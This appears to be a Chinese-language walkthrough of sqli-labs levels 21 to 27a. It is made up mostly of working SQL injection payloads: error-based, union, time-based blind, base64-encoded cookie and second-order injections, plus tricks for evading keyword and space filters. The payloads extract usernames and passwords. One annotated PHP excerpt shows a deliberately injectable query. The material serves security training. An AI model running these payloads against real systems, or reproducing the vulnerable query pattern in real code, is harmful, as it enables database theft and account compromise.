
21关

Cookie 注入：载荷需先做 base64 编码，注入点以单引号闭合

-- 表
admin' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)) and '1' = '1
YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSAgbGltaXQgMywxKSwweDdlKSwxKSkgYW5kICcxJyA9ICcx


-- 列
YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycgbGltaXQgMSwxKSwweDdlKSwxKSkgYW5kICcxJyA9ICcx


YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycgbGltaXQgMiwxKSwweDdlKSwxKSkgYW5kICcxJyA9ICcx

-- 数据
YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VybmFtZSBmcm9tIHVzZXJzICBsaW1pdCAzLDEpLDB4N2UpLDEpKSBhbmQgJzEnID0gJzE=

YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzICBsaW1pdCAzLDEpLDB4N2UpLDEpKSBhbmQgJzEnID0gJzE=

22关

Cookie 注入：载荷需先做 base64 编码，注入点以双引号闭合

-- 表
admin" and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)) and "1" = "1
YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSAgbGltaXQgMywxKSwweDdlKSwxKSkgYW5kICIxIiA9ICIx

-- 列
YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpICBhbmQgdGFibGVfbmFtZT0ndXNlcnMnIGxpbWl0IDEsMSksMHg3ZSksMSkpIGFuZCAiMSIgPSAiMQ==

YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBjb2x1bW5fbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpICBhbmQgdGFibGVfbmFtZT0ndXNlcnMnIGxpbWl0IDIsMSksMHg3ZSksMSkpIGFuZCAiMSIgPSAiMQ==
-- 数据
YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VybmFtZSBmcm9tIHVzZXJzIGxpbWl0IDMsMSksMHg3ZSksMSkpIGFuZCAiMSIgPSAiMQ==

YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzIGxpbWl0IDMsMSksMHg3ZSksMSkpIGFuZCAiMSIgPSAiMQ==

23关

基于 GET 的报错注入，注释符（# 和 --）被过滤

分析源代码

// Excerpt of the level's lookup code (PHP, legacy mysql_* extension), reproduced for analysis.
// The only "filtering" is the removal of two SQL comment tokens below; nothing escapes or
// validates $id, so this block is the injection point the rest of the page exercises.
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
// Remove every '#' and '--' from the raw id. This is a denylist on two literal tokens,
// not sanitisation: the quote that delimits the literal on the SELECT line is untouched.
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
// Append the (still untrusted) id to a local file. fopen()/fwrite() results are not checked,
// and attacker-controlled text is written to the log verbatim (log injection, unbounded growth).
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// Vulnerable: $id is interpolated straight into the query string. The mitigation is a bound
// parameter (mysqli/PDO prepared statement) or, if id is meant to be numeric, an integer cast
// before the value ever reaches the SQL text.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// The return value of mysql_query() is not checked before the fetch; a failed query (which is
// what a malformed id produces) surfaces as a database error message to the caller.
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
-- 表
?id=-1' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 3,1),3 and '1' = '1

-- 列
?id=-1' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),3 and '1' = '1
?id=-1' union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),3 and '1' = '1

-- 数据
?id=-1' union select 1,(select username from users limit 3,1),3 and '1' = '1
?id=-1' union select 1,(select password from users limit 3,1),3 and '1' = '1

24关

本关为二次注入（second-order injection）：查看源码可知，修改密码时直接使用 username，没有进行过滤。
可以注册一个新账户 Dumb'#，密码为 123456。
登录 Dumb'# 账户，修改密码为 password，再次使用 Dumb 登录，会发现原账户的密码已被修改为 password。

25关

本关过滤了 and 和 or 关键字，按常规思路注入即可；注意 password、information_schema 等标识符本身含有 or，同样会被过滤，需要改写以绕过检测

-- 表
?id=-1' union select 1,2,group_concat('~',table_name) from infoorrmation_schema.tables where table_schema=database() --+
-- 列
?id=-1' union select 1,2,group_concat('~',column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='users' --+
-- 数据
?id=-1' union select 1,2,group_concat('~',username,passwoorrd) from users --+

25a关

本关与 25 关基本一致，只是注入点换成了数字型

-- 表
?id=-1 union select 1,2,group_concat('~',table_name) from infoorrmation_schema.tables where table_schema=database() --+
-- 列
?id=-1 union select 1,2,group_concat('~',column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='users' --+
-- 数据
?id=-1' union select 1,2,group_concat('~',username,passwoorrd) from users --+

26关

本关过滤了大多数字符和关键字，如注释符、and、or、空格等；空格用 %0B 代替，逻辑运算用 | 代替

-- 表
?id=1'%0B||updatexml(1,concat("~",(select%0Btable_name%0Bfrom%0Binfoorrmation_schema.tables%0Bwhere%0Btable_schema=database()%0Blimit%0B3,1)),1)|'1'='1
-- 列
?id=-1'%0B||updatexml(1,concat("~",(select%0Bcolumn_name%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema=database()%0Banandd%0Btable_name='users'%0Blimit%0B1,1)),1)|'1'='1
?id=-1'%0B||updatexml(1,concat("~",(select%0Bcolumn_name%0Bfrom%0Binfoorrmation_schema.columns%0Bwhere%0Btable_schema=database()%0Banandd%0Btable_name='users'%0Blimit%0B2,1)),1)|'1'='1
-- 数据
?id=-1'%0B||updatexml(1,concat("~",(select%0Busername%0Bfrom%0Busers%0Blimit%0B3,1)),1)|'1'='1
?id=-1'%0B||updatexml(1,concat("~",(select%0Bpassword%0Bfrom%0Busers%0Blimit%0B3,1)),1)|'1'='1

26a关

时间盲注

?id=-1')|if(substring((database()),1,1)="s",sleep(5),1)|('1')=('1

27关

使用%0B代替空格绕过

?id=1'%0Band%0Bupdatexml(1,concat("~",database()),1)%0Band'1'='1

27a关

时间盲注

?id=1"%0Band%0Bif(substring(database(),1,1)="s",sleep(5),1)and"1"="1